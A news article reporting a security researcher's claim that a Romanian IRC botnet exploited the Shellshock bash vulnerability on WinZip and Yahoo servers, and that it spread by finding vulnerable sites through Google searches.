White hat claims Yahoo and WinZip hacked by “shellshock” exploiters
A security researcher claims to have uncovered a botnet being built by Romanian hackers using the “Shellshock” exploit against servers on a number of high-profile domains, including servers at Yahoo and the utility software developer WinZip. Jonathan Hall, president and senior engineer of technology consulting firm Future South Technologies published a lengthy explanation of the exploits and his communications with the exploited on his company’s website this weekend and said that Yahoo had acknowledged finding traces of the botnet on two of its servers.
Hall found the botnet, he said, by tracking down the source of requests that probed one of his servers for vulnerable CGI server scripts that could be exploited using the Shellshock bash vulnerability. That security flaw allows an attacker to use those vulnerable server scripts to pass commands on to the local operating system, potentially allowing the attacker take remote control of the server. Hall traced the probes back to a server at WinZip.com. He then used his own exploit of the bash bug to check the processes running on the WinZip server and identified a Perl script running there named ha.pl.
After extracting the contents of the script, Hall discovered that it was an Internet Relay Chat (IRC) bot similar to ones used to perform distributed denial of service attacks on IRC servers. However, as he examined it more closely, he found that it “appeared to focus more on shell interaction than DDoS capabilities,” he wrote. According to Hall, it takes remote control of the server, while using its IRC code to report back to an IRC channel (called, creatively, #bash). The code was also heavily commented in Romanian.
Hall said that he then remotely killed the process and notified both WinZip and the FBI by e-mail of the presence of the hack. His decision to kill it was made “considering this was one of their “store” boxes, which serves as a payment gateway for WinZip purchases. Not good…”
Hall then used the information from the Perl script to connect to the IRC channel used for communication and watch its contents. He said he saw traffic coming from bots running on a number of “pretty high profile” domains, including lycos.com and yahoo.com. The contents of the IRC channel appeared to show that it was being used for command and control of the bots and to extract configuration data—including their operating system version and system information, the contents of their “hosts” table—and to install additional scripts. While one of the Yahoo servers he saw exploited was an application server for Yahoo Sports, he noted that the attacks seemed to be focused on gaining access to Yahoo’s Games servers.
After sending e-mails and messages via Twitter to a number of people at Yahoo—including a message directed to Yahoo CEO Marissa Meyer that was CC’d to the New Orleans office of the FBI—Hall said that he received a response from Yahoo security, thanking him for the information. “We’ve found the tracks mentioned in your e-mail and are working through our IR (intelligence response) process,” a Yahoo security staffer wrote in an e-mail posted by Hall on his site.
Hall found the exploits on WinZip and Yahoo after he had conducted his own scan for potentially vulnerable sites using his own Shellshock exploit code. He also used Google searches against the sites he found that were vulnerable and discovered that many of them had already been exploited by IRC bots similar to the ones discovered on WinZip’s and Yahoo’s servers:
Almost every single vulnerable site I found via Google searches had a .pl either in the cgi-bin directory or in /tmp, and /var/tmp, that connected back to an IRC server…I analyzed [the code] and realized that some of them have their own spreading capabilities—using the same methodology of searching Google, but getting very, very specific in their searches. The spreader code actually drilled down to searching specific TLD’s—i.e. .com, .nz, .co.uk, .jp, etc…—using the site: search modifier. This was an interesting find, because it shows a level on ingenuity behind the spreader. The one thing in common amidst almost all of the different perl scripts I found—they all used the SAME spreader code.
That would seem to indicate that there are already exploits of bash in the wild that are actively using Google Search and other tools as a mechanism to act as a worm, spreading backdoors to vulnerable systems as they are discovered and adding them to the attack-spreading network. Even if systems have been patched since the attack started, the bot scripts may remain on previously vulnerable systems.
We’ve attempted to reach out to Yahoo and WinZip for comment on the reported server breaches but have not gotten a response. We’ll update this report when more information is made available.